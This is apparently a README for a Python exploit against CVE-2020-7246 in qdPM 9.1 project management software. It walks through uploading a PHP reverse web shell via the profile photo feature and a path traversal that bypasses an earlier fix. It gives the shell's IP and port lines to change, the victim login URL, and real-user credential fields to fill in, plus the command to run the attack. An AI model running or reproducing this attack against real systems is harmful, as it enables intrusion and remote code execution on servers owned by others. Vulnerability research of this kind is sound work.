This is an exploit to automatically upload a PHP web shell to the qdPM 9.1 platform via the "upload a profile photo" feature. This method also bypasses the fix put into place from a previous CVE
| CVE: | CVE-2020-7246 |
|---|---|
| NVD Published Date: | 01/21/2020 |
| Base Score | 8.8 (HIGH) |
| Vulnerability Type | Web Exploit / RCE |
A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.
As published by the developers: "qdPM is a free web-based [LAMP] project management tool suitable for a small team working on multiple projects. It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact using a Ticket System that is integrated into Task management."
To use this exploit, you must know the credentials of at least one user. They don’t need to have any kind of elevated privilege. You also need to have a .php web shell that you want to upload.
You can upload your own PHP webshell with this script, however, this exploit was tested using the exploit built by Pentestmonkey (which is included in this repo). You want to make sure that you configure your webshell to call out to the attacker machine, and that you also make note of the port that it is sending the reverse shell through. If you are using the webshell that is included then you should open the .php file and modify the following two lines found near the top:
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
Next, you need to open the qdPM9.1_exploit.py script and then modify the values near the top of the script:
login_url = "http://[victim_domain]/path/to/qdPM/index.php/login"
username = "jsmith@example.com" # This should be a real user's email
password = "Pa$$w0rd" # This should be the real user's password
payload = "/path/to/payload.php"
listner_port = 1234 # This should match your PHP payload
connection_delay = 2 # Increase this value if you have a slow connection and are experiencing issues
Once the payload and exploit script has been updated, you simply run the script by executing it via the terminal:
python3 ./qdPM9.1_exploit.py
If you get hit with dependency errors you may need to install BeaufifulSoup4 and/or requests:
pip3 install bs4
pip3 install requests
If you want to see how this exploit works in detail along with a breakdown of how the script was developed then check out my blog post on the subject!
This script was developed to better understand CVE-2020-7246 and build upon the PoC that already exists. This script should only be used for educational purposes.